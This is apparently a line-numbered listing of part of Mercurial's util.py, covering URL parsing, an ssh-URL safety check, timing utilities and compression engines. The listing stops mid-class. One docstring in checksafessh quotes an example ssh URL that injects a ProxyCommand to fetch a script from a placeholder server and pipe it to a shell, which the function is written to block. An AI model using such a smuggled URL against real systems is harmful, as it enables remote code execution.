2774 2788 if path and not hasdriveletter(path):
2775 2789 path = '/' + path
2776 2790
2777 2791 if self.host and '@' in self.host:
2778 2792 self.user, self.host = self.host.rsplit('@', 1)
2779 2793 if ':' in self.user:
2780 2794 self.user, self.passwd = self.user.split(':', 1)
2781 2795 if not self.host:
2782 2796 self.host = None
2783 2797
2784 2798 # Don't split on colons in IPv6 addresses without ports
2785 2799 if (self.host and ':' in self.host and
2786 2800 not (self.host.startswith('[') and self.host.endswith(']'))):
2787 2801 self._hostport = self.host
2788 2802 self.host, self.port = self.host.rsplit(':', 1)
2789 2803 if not self.host:
2790 2804 self.host = None
2791 2805
2792 2806 if (self.host and self.scheme == 'file' and
2793 2807 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2794 2808 raise error.Abort(_('file:// URLs can only refer to localhost'))
2795 2809
2796 2810 self.path = path
2797 2811
2798 2812 # leave the query string escaped
2799 2813 for a in ('user', 'passwd', 'host', 'port',
2800 2814 'path', 'fragment'):
2801 2815 v = getattr(self, a)
2802 2816 if v is not None:
2803 2817 setattr(self, a, urlreq.unquote(v))
2804 2818
2805 2819 @encoding.strmethod
2806 2820 def __repr__(self):
2807 2821 attrs = []
2808 2822 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2809 2823 'query', 'fragment'):
2810 2824 v = getattr(self, a)
2811 2825 if v is not None:
2812 2826 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2813 2827 return '<url %s>' % ', '.join(attrs)
2814 2828
2815 2829 def __bytes__(self):
2816 2830 r"""Join the URL's components back into a URL string.
2817 2831
2818 2832 Examples:
2819 2833
2820 2834 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2821 2835 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2822 2836 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2823 2837 'http://user:pw@host:80/?foo=bar&baz=42'
2824 2838 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2825 2839 'http://user:pw@host:80/?foo=bar%3dbaz'
2826 2840 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2827 2841 'ssh://user:pw@[::1]:2200//home/joe#'
2828 2842 >>> bytes(url(b'http://localhost:80//'))
2829 2843 'http://localhost:80//'
2830 2844 >>> bytes(url(b'http://localhost:80/'))
2831 2845 'http://localhost:80/'
2832 2846 >>> bytes(url(b'http://localhost:80'))
2833 2847 'http://localhost:80/'
2834 2848 >>> bytes(url(b'bundle:foo'))
2835 2849 'bundle:foo'
2836 2850 >>> bytes(url(b'bundle://../foo'))
2837 2851 'bundle:../foo'
2838 2852 >>> bytes(url(b'path'))
2839 2853 'path'
2840 2854 >>> bytes(url(b'file:///tmp/foo/bar'))
2841 2855 'file:///tmp/foo/bar'
2842 2856 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2843 2857 'file:///c:/tmp/foo/bar'
2844 2858 >>> print(url(br'bundle:foo\bar'))
2845 2859 bundle:foo\bar
2846 2860 >>> print(url(br'file:///D:\data\hg'))
2847 2861 file:///D:\data\hg
2848 2862 """
2849 2863 if self._localpath:
2850 2864 s = self.path
2851 2865 if self.scheme == 'bundle':
2852 2866 s = 'bundle:' + s
2853 2867 if self.fragment:
2854 2868 s += '#' + self.fragment
2855 2869 return s
2856 2870
2857 2871 s = self.scheme + ':'
2858 2872 if self.user or self.passwd or self.host:
2859 2873 s += '//'
2860 2874 elif self.scheme and (not self.path or self.path.startswith('/')
2861 2875 or hasdriveletter(self.path)):
2862 2876 s += '//'
2863 2877 if hasdriveletter(self.path):
2864 2878 s += '/'
2865 2879 if self.user:
2866 2880 s += urlreq.quote(self.user, safe=self._safechars)
2867 2881 if self.passwd:
2868 2882 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2869 2883 if self.user or self.passwd:
2870 2884 s += '@'
2871 2885 if self.host:
2872 2886 if not (self.host.startswith('[') and self.host.endswith(']')):
2873 2887 s += urlreq.quote(self.host)
2874 2888 else:
2875 2889 s += self.host
2876 2890 if self.port:
2877 2891 s += ':' + urlreq.quote(self.port)
2878 2892 if self.host:
2879 2893 s += '/'
2880 2894 if self.path:
2881 2895 # TODO: similar to the query string, we should not unescape the
2882 2896 # path when we store it, the path might contain '%2f' = '/',
2883 2897 # which we should *not* escape.
2884 2898 s += urlreq.quote(self.path, safe=self._safepchars)
2885 2899 if self.query:
2886 2900 # we store the query in escaped form.
2887 2901 s += '?' + self.query
2888 2902 if self.fragment is not None:
2889 2903 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2890 2904 return s
2891 2905
2892 2906 __str__ = encoding.strmethod(__bytes__)
2893 2907
2894 2908 def authinfo(self):
2895 2909 user, passwd = self.user, self.passwd
2896 2910 try:
2897 2911 self.user, self.passwd = None, None
2898 2912 s = bytes(self)
2899 2913 finally:
2900 2914 self.user, self.passwd = user, passwd
2901 2915 if not self.user:
2902 2916 return (s, None)
2903 2917 # authinfo[1] is passed to urllib2 password manager, and its
2904 2918 # URIs must not contain credentials. The host is passed in the
2905 2919 # URIs list because Python < 2.4.3 uses only that to search for
2906 2920 # a password.
2907 2921 return (s, (None, (s, self.host),
2908 2922 self.user, self.passwd or ''))
2909 2923
2910 2924 def isabs(self):
2911 2925 if self.scheme and self.scheme != 'file':
2912 2926 return True # remote URL
2913 2927 if hasdriveletter(self.path):
2914 2928 return True # absolute for our purposes - can't be joined()
2915 2929 if self.path.startswith(br'\\'):
2916 2930 return True # Windows UNC path
2917 2931 if self.path.startswith('/'):
2918 2932 return True # POSIX-style
2919 2933 return False
2920 2934
2921 2935 def localpath(self):
2922 2936 if self.scheme == 'file' or self.scheme == 'bundle':
2923 2937 path = self.path or '/'
2924 2938 # For Windows, we need to promote hosts containing drive
2925 2939 # letters to paths with drive letters.
2926 2940 if hasdriveletter(self._hostport):
2927 2941 path = self._hostport + '/' + self.path
2928 2942 elif (self.host is not None and self.path
2929 2943 and not hasdriveletter(path)):
2930 2944 path = '/' + path
2931 2945 return path
2932 2946 return self._origpath
2933 2947
2934 2948 def islocal(self):
2935 2949 '''whether localpath will return something that posixfile can open'''
2936 2950 return (not self.scheme or self.scheme == 'file'
2937 2951 or self.scheme == 'bundle')
2938 2952
2939 2953 def hasscheme(path):
2940 2954 return bool(url(path).scheme)
2941 2955
2942 2956 def hasdriveletter(path):
2943 2957 return path and path[1:2] == ':' and path[0:1].isalpha()
2944 2958
2945 2959 def urllocalpath(path):
2946 2960 return url(path, parsequery=False, parsefragment=False).localpath()
2947 2961
2948 2962 def checksafessh(path):
2949 2963 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2950 2964
2951 2965 This is a sanity check for ssh urls. ssh will parse the first item as
2952 2966 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2953 2967 Let's prevent these potentially exploited urls entirely and warn the
2954 2968 user.
2955 2969
2956 2970 Raises an error.Abort when the url is unsafe.
2957 2971 """
2958 2972 path = urlreq.unquote(path)
2959 2973 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2960 2974 raise error.Abort(_('potentially unsafe url: %r') %
2961 2975 (pycompat.bytestr(path),))
2962 2976
2963 2977 def hidepassword(u):
2964 2978 '''hide user credential in a url string'''
2965 2979 u = url(u)
2966 2980 if u.passwd:
2967 2981 u.passwd = '***'
2968 2982 return bytes(u)
2969 2983
2970 2984 def removeauth(u):
2971 2985 '''remove all authentication information from a url string'''
2972 2986 u = url(u)
2973 2987 u.user = u.passwd = None
2974 2988 return bytes(u)
2975 2989
2976 2990 timecount = unitcountfn(
2977 2991 (1, 1e3, _('%.0f s')),
2978 2992 (100, 1, _('%.1f s')),
2979 2993 (10, 1, _('%.2f s')),
2980 2994 (1, 1, _('%.3f s')),
2981 2995 (100, 0.001, _('%.1f ms')),
2982 2996 (10, 0.001, _('%.2f ms')),
2983 2997 (1, 0.001, _('%.3f ms')),
2984 2998 (100, 0.000001, _('%.1f us')),
2985 2999 (10, 0.000001, _('%.2f us')),
2986 3000 (1, 0.000001, _('%.3f us')),
2987 3001 (100, 0.000000001, _('%.1f ns')),
2988 3002 (10, 0.000000001, _('%.2f ns')),
2989 3003 (1, 0.000000001, _('%.3f ns')),
2990 3004 )
2991 3005
2992 3006 @attr.s
2993 3007 class timedcmstats(object):
2994 3008 """Stats information produced by the timedcm context manager on entering."""
2995 3009
2996 3010 # the starting value of the timer as a float (meaning and resulution is
2997 3011 # platform dependent, see util.timer)
2998 3012 start = attr.ib(default=attr.Factory(lambda: timer()))
2999 3013 # the number of seconds as a floating point value; starts at 0, updated when
3000 3014 # the context is exited.
3001 3015 elapsed = attr.ib(default=0)
3002 3016 # the number of nested timedcm context managers.
3003 3017 level = attr.ib(default=1)
3004 3018
3005 3019 def __bytes__(self):
3006 3020 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3007 3021
3008 3022 __str__ = encoding.strmethod(__bytes__)
3009 3023
3010 3024 @contextlib.contextmanager
3011 3025 def timedcm(whencefmt, *whenceargs):
3012 3026 """A context manager that produces timing information for a given context.
3013 3027
3014 3028 On entering a timedcmstats instance is produced.
3015 3029
3016 3030 This context manager is reentrant.
3017 3031
3018 3032 """
3019 3033 # track nested context managers
3020 3034 timedcm._nested += 1
3021 3035 timing_stats = timedcmstats(level=timedcm._nested)
3022 3036 try:
3023 3037 with tracing.log(whencefmt, *whenceargs):
3024 3038 yield timing_stats
3025 3039 finally:
3026 3040 timing_stats.elapsed = timer() - timing_stats.start
3027 3041 timedcm._nested -= 1
3028 3042
3029 3043 timedcm._nested = 0
3030 3044
3031 3045 def timed(func):
3032 3046 '''Report the execution time of a function call to stderr.
3033 3047
3034 3048 During development, use as a decorator when you need to measure
3035 3049 the cost of a function, e.g. as follows:
3036 3050
3037 3051 @util.timed
3038 3052 def foo(a, b, c):
3039 3053 pass
3040 3054 '''
3041 3055
3042 3056 def wrapper(*args, **kwargs):
3043 3057 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3044 3058 result = func(*args, **kwargs)
3045 3059 stderr = procutil.stderr
3046 3060 stderr.write('%s%s: %s\n' % (
3047 3061 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3048 3062 time_stats))
3049 3063 return result
3050 3064 return wrapper
3051 3065
3052 3066 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3053 3067 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3054 3068
3055 3069 def sizetoint(s):
3056 3070 '''Convert a space specifier to a byte count.
3057 3071
3058 3072 >>> sizetoint(b'30')
3059 3073 30
3060 3074 >>> sizetoint(b'2.2kb')
3061 3075 2252
3062 3076 >>> sizetoint(b'6M')
3063 3077 6291456
3064 3078 '''
3065 3079 t = s.strip().lower()
3066 3080 try:
3067 3081 for k, u in _sizeunits:
3068 3082 if t.endswith(k):
3069 3083 return int(float(t[:-len(k)]) * u)
3070 3084 return int(t)
3071 3085 except ValueError:
3072 3086 raise error.ParseError(_("couldn't parse size: %s") % s)
3073 3087
3074 3088 class hooks(object):
3075 3089 '''A collection of hook functions that can be used to extend a
3076 3090 function's behavior. Hooks are called in lexicographic order,
3077 3091 based on the names of their sources.'''
3078 3092
3079 3093 def __init__(self):
3080 3094 self._hooks = []
3081 3095
3082 3096 def add(self, source, hook):
3083 3097 self._hooks.append((source, hook))
3084 3098
3085 3099 def __call__(self, *args):
3086 3100 self._hooks.sort(key=lambda x: x[0])
3087 3101 results = []
3088 3102 for source, hook in self._hooks:
3089 3103 results.append(hook(*args))
3090 3104 return results
3091 3105
3092 3106 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3093 3107 '''Yields lines for a nicely formatted stacktrace.
3094 3108 Skips the 'skip' last entries, then return the last 'depth' entries.
3095 3109 Each file+linenumber is formatted according to fileline.
3096 3110 Each line is formatted according to line.
3097 3111 If line is None, it yields:
3098 3112 length of longest filepath+line number,
3099 3113 filepath+linenumber,
3100 3114 function
3101 3115
3102 3116 Not be used in production code but very convenient while developing.
3103 3117 '''
3104 3118 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3105 3119 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3106 3120 ][-depth:]
3107 3121 if entries:
3108 3122 fnmax = max(len(entry[0]) for entry in entries)
3109 3123 for fnln, func in entries:
3110 3124 if line is None:
3111 3125 yield (fnmax, fnln, func)
3112 3126 else:
3113 3127 yield line % (fnmax, fnln, func)
3114 3128
3115 3129 def debugstacktrace(msg='stacktrace', skip=0,
3116 3130 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3117 3131 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3118 3132 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3119 3133 By default it will flush stdout first.
3120 3134 It can be used everywhere and intentionally does not require an ui object.
3121 3135 Not be used in production code but very convenient while developing.
3122 3136 '''
3123 3137 if otherf:
3124 3138 otherf.flush()
3125 3139 f.write('%s at:\n' % msg.rstrip())
3126 3140 for line in getstackframes(skip + 1, depth=depth):
3127 3141 f.write(line)
3128 3142 f.flush()
3129 3143
3130 3144 class dirs(object):
3131 3145 '''a multiset of directory names from a dirstate or manifest'''
3132 3146
3133 3147 def __init__(self, map, skip=None):
3134 3148 self._dirs = {}
3135 3149 addpath = self.addpath
3136 3150 if safehasattr(map, 'iteritems') and skip is not None:
3137 3151 for f, s in map.iteritems():
3138 3152 if s[0] != skip:
3139 3153 addpath(f)
3140 3154 else:
3141 3155 for f in map:
3142 3156 addpath(f)
3143 3157
3144 3158 def addpath(self, path):
3145 3159 dirs = self._dirs
3146 3160 for base in finddirs(path):
3147 3161 if base in dirs:
3148 3162 dirs[base] += 1
3149 3163 return
3150 3164 dirs[base] = 1
3151 3165
3152 3166 def delpath(self, path):
3153 3167 dirs = self._dirs
3154 3168 for base in finddirs(path):
3155 3169 if dirs[base] > 1:
3156 3170 dirs[base] -= 1
3157 3171 return
3158 3172 del dirs[base]
3159 3173
3160 3174 def __iter__(self):
3161 3175 return iter(self._dirs)
3162 3176
3163 3177 def __contains__(self, d):
3164 3178 return d in self._dirs
3165 3179
3166 3180 if safehasattr(parsers, 'dirs'):
3167 3181 dirs = parsers.dirs
3168 3182
3169 3183 def finddirs(path):
3170 3184 pos = path.rfind('/')
3171 3185 while pos != -1:
3172 3186 yield path[:pos]
3173 3187 pos = path.rfind('/', 0, pos)
3174 3188
3175 3189 # compression code
3176 3190
3177 3191 SERVERROLE = 'server'
3178 3192 CLIENTROLE = 'client'
3179 3193
3180 3194 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3181 3195 (u'name', u'serverpriority',
3182 3196 u'clientpriority'))
3183 3197
3184 3198 class compressormanager(object):
3185 3199 """Holds registrations of various compression engines.
3186 3200
3187 3201 This class essentially abstracts the differences between compression
3188 3202 engines to allow new compression formats to be added easily, possibly from
3189 3203 extensions.
3190 3204
3191 3205 Compressors are registered against the global instance by calling its
3192 3206 ``register()`` method.
3193 3207 """
3194 3208 def __init__(self):
3195 3209 self._engines = {}
3196 3210 # Bundle spec human name to engine name.
3197 3211 self._bundlenames = {}
3198 3212 # Internal bundle identifier to engine name.
3199 3213 self._bundletypes = {}
3200 3214 # Revlog header to engine name.
3201 3215 self._revlogheaders = {}
3202 3216 # Wire proto identifier to engine name.
3203 3217 self._wiretypes = {}
3204 3218
3205 3219 def __getitem__(self, key):
3206 3220 return self._engines[key]
3207 3221
3208 3222 def __contains__(self, key):
3209 3223 return key in self._engines
3210 3224
3211 3225 def __iter__(self):
3212 3226 return iter(self._engines.keys())
3213 3227
3214 3228 def register(self, engine):
3215 3229 """Register a compression engine with the manager.
3216 3230
3217 3231 The argument must be a ``compressionengine`` instance.
3218 3232 """
3219 3233 if not isinstance(engine, compressionengine):
3220 3234 raise ValueError(_('argument must be a compressionengine'))
3221 3235
3222 3236 name = engine.name()
3223 3237
3224 3238 if name in self._engines:
3225 3239 raise error.Abort(_('compression engine %s already registered') %
3226 3240 name)
3227 3241
3228 3242 bundleinfo = engine.bundletype()
3229 3243 if bundleinfo:
3230 3244 bundlename, bundletype = bundleinfo
3231 3245
3232 3246 if bundlename in self._bundlenames:
3233 3247 raise error.Abort(_('bundle name %s already registered') %
3234 3248 bundlename)
3235 3249 if bundletype in self._bundletypes:
3236 3250 raise error.Abort(_('bundle type %s already registered by %s') %
3237 3251 (bundletype, self._bundletypes[bundletype]))
3238 3252
3239 3253 # No external facing name declared.
3240 3254 if bundlename:
3241 3255 self._bundlenames[bundlename] = name
3242 3256
3243 3257 self._bundletypes[bundletype] = name
3244 3258
3245 3259 wiresupport = engine.wireprotosupport()
3246 3260 if wiresupport:
3247 3261 wiretype = wiresupport.name
3248 3262 if wiretype in self._wiretypes:
3249 3263 raise error.Abort(_('wire protocol compression %s already '
3250 3264 'registered by %s') %
3251 3265 (wiretype, self._wiretypes[wiretype]))
3252 3266
3253 3267 self._wiretypes[wiretype] = name
3254 3268
3255 3269 revlogheader = engine.revlogheader()
3256 3270 if revlogheader and revlogheader in self._revlogheaders:
3257 3271 raise error.Abort(_('revlog header %s already registered by %s') %
3258 3272 (revlogheader, self._revlogheaders[revlogheader]))
3259 3273
3260 3274 if revlogheader:
3261 3275 self._revlogheaders[revlogheader] = name
3262 3276
3263 3277 self._engines[name] = engine
3264 3278
3265 3279 @property
3266 3280 def supportedbundlenames(self):
3267 3281 return set(self._bundlenames.keys())
3268 3282
3269 3283 @property
3270 3284 def supportedbundletypes(self):
3271 3285 return set(self._bundletypes.keys())
3272 3286
3273 3287 def forbundlename(self, bundlename):
3274 3288 """Obtain a compression engine registered to a bundle name.
3275 3289
3276 3290 Will raise KeyError if the bundle type isn't registered.
3277 3291
3278 3292 Will abort if the engine is known but not available.
3279 3293 """
3280 3294 engine = self._engines[self._bundlenames[bundlename]]
3281 3295 if not engine.available():
3282 3296 raise error.Abort(_('compression engine %s could not be loaded') %
3283 3297 engine.name())
3284 3298 return engine
3285 3299
3286 3300 def forbundletype(self, bundletype):
3287 3301 """Obtain a compression engine registered to a bundle type.
3288 3302
3289 3303 Will raise KeyError if the bundle type isn't registered.
3290 3304
3291 3305 Will abort if the engine is known but not available.
3292 3306 """
3293 3307 engine = self._engines[self._bundletypes[bundletype]]
3294 3308 if not engine.available():
3295 3309 raise error.Abort(_('compression engine %s could not be loaded') %
3296 3310 engine.name())
3297 3311 return engine
3298 3312
3299 3313 def supportedwireengines(self, role, onlyavailable=True):
3300 3314 """Obtain compression engines that support the wire protocol.
3301 3315
3302 3316 Returns a list of engines in prioritized order, most desired first.
3303 3317
3304 3318 If ``onlyavailable`` is set, filter out engines that can't be
3305 3319 loaded.
3306 3320 """
3307 3321 assert role in (SERVERROLE, CLIENTROLE)
3308 3322
3309 3323 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3310 3324
3311 3325 engines = [self._engines[e] for e in self._wiretypes.values()]
3312 3326 if onlyavailable:
3313 3327 engines = [e for e in engines if e.available()]
3314 3328
3315 3329 def getkey(e):
3316 3330 # Sort first by priority, highest first. In case of tie, sort
3317 3331 # alphabetically. This is arbitrary, but ensures output is
3318 3332 # stable.
3319 3333 w = e.wireprotosupport()
3320 3334 return -1 * getattr(w, attr), w.name
3321 3335
3322 3336 return list(sorted(engines, key=getkey))
3323 3337
3324 3338 def forwiretype(self, wiretype):
3325 3339 engine = self._engines[self._wiretypes[wiretype]]
3326 3340 if not engine.available():
3327 3341 raise error.Abort(_('compression engine %s could not be loaded') %
3328 3342 engine.name())
3329 3343 return engine
3330 3344
3331 3345 def forrevlogheader(self, header):
3332 3346 """Obtain a compression engine registered to a revlog header.
3333 3347
3334 3348 Will raise KeyError if the revlog header value isn't registered.
3335 3349 """
3336 3350 return self._engines[self._revlogheaders[header]]
3337 3351
3338 3352 compengines = compressormanager()
3339 3353
3340 3354 class compressionengine(object):
3341 3355 """Base class for compression engines.
3342 3356
3343 3357 Compression engines must implement the interface defined by this class.
3344 3358 """
3345 3359 def name(self):
3346 3360 """Returns the name of the compression engine.
3347 3361
3348 3362 This is the key the engine is registered under.
3349 3363
3350 3364 This method must be implemented.
3351 3365 """
3352 3366 raise NotImplementedError()
3353 3367
3354 3368 def available(self):
3355 3369 """Whether the compression engine is available.
3356 3370
3357 3371 The intent of this method is to allow optional compression engines
3358 3372 that may not be available in all installations (such as engines relying
3359 3373 on C extensions that may not be present).
3360 3374 """
3361 3375 return True
3362 3376
3363 3377 def bundletype(self):
3364 3378 """Describes bundle identifiers for this engine.
3365 3379
3366 3380 If this compression engine isn't supported for bundles, returns None.
3367 3381
3368 3382 If this engine can be used for bundles, returns a 2-tuple of strings of
3369 3383 the user-facing "bundle spec" compression name and an internal
3370 3384 identifier used to denote the compression format within bundles. To
3371 3385 exclude the name from external usage, set the first element to ``None``.
3372 3386
3373 3387 If bundle compression is supported, the class must also implement
3374 3388 ``compressstream`` and `decompressorreader``.
3375 3389
3376 3390 The docstring of this method is used in the help system to tell users
3377 3391 about this engine.
3378 3392 """
3379 3393 return None
3380 3394
3381 3395 def wireprotosupport(self):
3382 3396 """Declare support for this compression format on the wire protocol.
3383 3397
3384 3398 If this compression engine isn't supported for compressing wire
3385 3399 protocol payloads, returns None.
3386 3400
3387 3401 Otherwise, returns ``compenginewireprotosupport`` with the following
3388 3402 fields:
3389 3403
3390 3404 * String format identifier
3391 3405 * Integer priority for the server
3392 3406 * Integer priority for the client
3393 3407
3394 3408 The integer priorities are used to order the advertisement of format
3395 3409 support by server and client. The highest integer is advertised
3396 3410 first. Integers with non-positive values aren't advertised.
3397 3411
3398 3412 The priority values are somewhat arbitrary and only used for default
3399 3413 ordering. The relative order can be changed via config options.
3400 3414
3401 3415 If wire protocol compression is supported, the class must also implement
3402 3416 ``compressstream`` and ``decompressorreader``.
3403 3417 """
3404 3418 return None
3405 3419
3406 3420 def revlogheader(self):
3407 3421 """Header added to revlog chunks that identifies this engine.
3408 3422
3409 3423 If this engine can be used to compress revlogs, this method should
3410 3424 return the bytes used to identify chunks compressed with this engine.
3411 3425 Else, the method should return ``None`` to indicate it does not
3412 3426 participate in revlog compression.
3413 3427 """
3414 3428 return None
3415 3429
3416 3430 def compressstream(self, it, opts=None):
3417 3431 """Compress an iterator of chunks.
3418 3432
3419 3433 The method receives an iterator (ideally a generator) of chunks of
3420 3434 bytes to be compressed. It returns an iterator (ideally a generator)
3421 3435 of bytes of chunks representing the compressed output.
3422 3436
3423 3437 Optionally accepts an argument defining how to perform compression.
3424 3438 Each engine treats this argument differently.
3425 3439 """
3426 3440 raise NotImplementedError()
3427 3441
3428 3442 def decompressorreader(self, fh):
3429 3443 """Perform decompression on a file object.
3430 3444
3431 3445 Argument is an object with a ``read(size)`` method that returns
3432 3446 compressed data. Return value is an object with a ``read(size)`` that
3433 3447 returns uncompressed data.
3434 3448 """
3435 3449 raise NotImplementedError()
3436 3450
3437 3451 def revlogcompressor(self, opts=None):
3438 3452 """Obtain an object that can be used to compress revlog entries.
3439 3453
3440 3454 The object has a ``compress(data)`` method that compresses binary
3441 3455 data. This method returns compressed binary data or ``None`` if
3442 3456 the data could not be compressed (too small, not compressible, etc).
3443 3457 The returned data should have a header uniquely identifying this
3444 3458 compression format so decompression can be routed to this engine.
3445 3459 This header should be identified by the ``revlogheader()`` return
3446 3460 value.
3447 3461
3448 3462 The object has a ``decompress(data)`` method that decompresses
3449 3463 data. The method will only be called if ``data`` begins with
3450 3464 ``revlogheader()``. The method should return the raw, uncompressed
3451 3465 data or raise a ``StorageError``.
3452 3466
3453 3467 The object is reusable but is not thread safe.
3454 3468 """
3455 3469 raise NotImplementedError()
3456 3470
3457 3471 class _CompressedStreamReader(object):
3458 3472 def __init__(self, fh):
3459 3473 if safehasattr(fh, 'unbufferedread'):
3460 3474 self._reader = fh.unbufferedread
3461 3475 else:
3462 3476 self._reader = fh.read
3463 3477 self._pending = []
3464 3478 self._pos = 0
3465 3479 self._eof = False
3466 3480
3467 3481 def _decompress(self, chunk):
3468 3482 raise NotImplementedError()
3469 3483
3470 3484 def read(self, l):
3471 3485 buf = []
3472 3486 while True:
3473 3487 while self._pending:
3474 3488 if len(self._pending[0]) > l + self._pos:
3475 3489 newbuf = self._pending[0]
3476 3490 buf.append(newbuf[self._pos:self._pos + l])
3477 3491 self._pos += l
3478 3492 return ''.join(buf)
3479 3493
3480 3494 newbuf = self._pending.pop(0)
3481 3495 if self._pos:
3482 3496 buf.append(newbuf[self._pos:])
3483 3497 l -= len(newbuf) - self._pos
3484 3498 else:
3485 3499 buf.append(newbuf)
3486 3500 l -= len(newbuf)
3487 3501 self._pos = 0
3488 3502
3489 3503 if self._eof:
3490 3504 return ''.join(buf)
3491 3505 chunk = self._reader(65536)
3492 3506 self._decompress(chunk)
3493 3507 if not chunk and not self._pending and not self._eof:
3494 3508 # No progress and no new data, bail out
3495 3509 return ''.join(buf)
3496 3510
3497 3511 class _GzipCompressedStreamReader(_CompressedStreamReader):
3498 3512 def __init__(self, fh):
3499 3513 super(_GzipCompressedStreamReader, self).__init__(fh)
3500 3514 self._decompobj = zlib.decompressobj()
3501 3515 def _decompress(self, chunk):
3502 3516 newbuf = self._decompobj.decompress(chunk)
3503 3517 if newbuf:
3504 3518 self._pending.append(newbuf)
3505 3519 d = self._decompobj.copy()
3506 3520 try:
3507 3521 d.decompress('x')
3508 3522 d.flush()
3509 3523 if d.unused_data == 'x':
3510 3524 self._eof = True
3511 3525 except zlib.error:
3512 3526 pass
3513 3527
3514 3528 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3515 3529 def __init__(self, fh):
3516 3530 super(_BZ2CompressedStreamReader, self).__init__(fh)
3517 3531 self._decompobj = bz2.BZ2Decompressor()
3518 3532 def _decompress(self, chunk):
3519 3533 newbuf = self._decompobj.decompress(chunk)
3520 3534 if newbuf:
3521 3535 self._pending.append(newbuf)
3522 3536 try:
3523 3537 while True:
3524 3538 newbuf = self._decompobj.decompress('')
3525 3539 if newbuf:
3526 3540 self._pending.append(newbuf)
3527 3541 else:
3528 3542 break
3529 3543 except EOFError:
3530 3544 self._eof = True
3531 3545
3532 3546 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3533 3547 def __init__(self, fh):
3534 3548 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3535 3549 newbuf = self._decompobj.decompress('BZ')
3536 3550 if newbuf:
3537 3551 self._pending.append(newbuf)
3538 3552
3539 3553 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3540 3554 def __init__(self, fh, zstd):
3541 3555 super(_ZstdCompressedStreamReader, self).__init__(fh)
3542 3556 self._zstd = zstd
3543 3557 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3544 3558 def _decompress(self, chunk):
3545 3559 newbuf = self._decompobj.decompress(chunk)
3546 3560 if newbuf:
3547 3561 self._pending.append(newbuf)
3548 3562 try:
3549 3563 while True:
3550 3564 newbuf = self._decompobj.decompress('')
3551 3565 if newbuf:
3552 3566 self._pending.append(newbuf)
3553 3567 else:
3554 3568 break
3555 3569 except self._zstd.ZstdError:
3556 3570 self._eof = True
3557 3571
3558 3572 class _zlibengine(compressionengine):
3559 3573 def name(self):
3560 3574 return 'zlib'
3561 3575
3562 3576 def bundletype(self):
3563 3577 """zlib compression using the DEFLATE algorithm.
3564 3578
3565 3579 All Mercurial clients should support this format. The compression
3566 3580 algorithm strikes a reasonable balance between compression ratio
3567 3581 and size.
3568 3582 """
3569 3583 return 'gzip', 'GZ'
3570 3584
3571 3585 def wireprotosupport(self):
3572 3586 return compewireprotosupport('zlib', 20, 20)
3573 3587
3574 3588 def revlogheader(self):
3575 3589 return 'x'
3576 3590
3577 3591 def compressstream(self, it, opts=None):
3578 3592 opts = opts or {}
3579 3593
3580 3594 z = zlib.compressobj(opts.get('level', -1))
3581 3595 for chunk in it:
3582 3596 data = z.compress(chunk)
3583 3597 # Not all calls to compress emit data. It is cheaper to inspect
3584 3598 # here than to feed empty chunks through generator.
3585 3599 if data:
3586 3600 yield data
3587 3601
3588 3602 yield z.flush()
3589 3603
3590 3604 def decompressorreader(self, fh):
3591 3605 return _GzipCompressedStreamReader(fh)
3592 3606
3593 3607 class zlibrevlogcompressor(object):
3594 3608 def compress(self, data):
3595 3609 insize = len(data)
3596 3610 # Caller handles empty input case.
3597 3611 assert insize > 0
3598 3612
3599 3613 if insize < 44:
3600 3614 return None
3601 3615
3602 3616 elif insize <= 1000000:
3603 3617 compressed = zlib.compress(data)
3604 3618 if len(compressed) < insize:
3605 3619 return compressed
3606 3620 return None
3607 3621
3608 3622 # zlib makes an internal copy of the input buffer, doubling
3609 3623 # memory usage for large inputs. So do streaming compression
3610 3624 # on large inputs.
3611 3625 else:
3612 3626 z = zlib.compressobj()
3613 3627 parts = []
3614 3628 pos = 0
3615 3629 while pos < insize:
3616 3630 pos2 = pos + 2**20
3617 3631 parts.append(z.compress(data[pos:pos2]))
3618 3632 pos = pos2
3619 3633 parts.append(z.flush())
3620 3634
3621 3635 if sum(map(len, parts)) < insize:
3622 3636 return ''.join(parts)
3623 3637 return None
3624 3638
3625 3639 def decompress(self, data):
3626 3640 try:
3627 3641 return zlib.decompress(data)
3628 3642 except zlib.error as e:
3629 3643 raise error.StorageError(_('revlog decompress error: %s') %
3630 3644 stringutil.forcebytestr(e))
3631 3645
3632 3646 def revlogcompressor(self, opts=None):
3633 3647 return self.zlibrevlogcompressor()
3634 3648
3635 3649 compengines.register(_zlibengine())
3636 3650
3637 3651 class _bz2engine(compressionengine):
3638 3652 def name(self):
3639 3653 return 'bz2'
3640 3654
3641 3655 def bundletype(self):
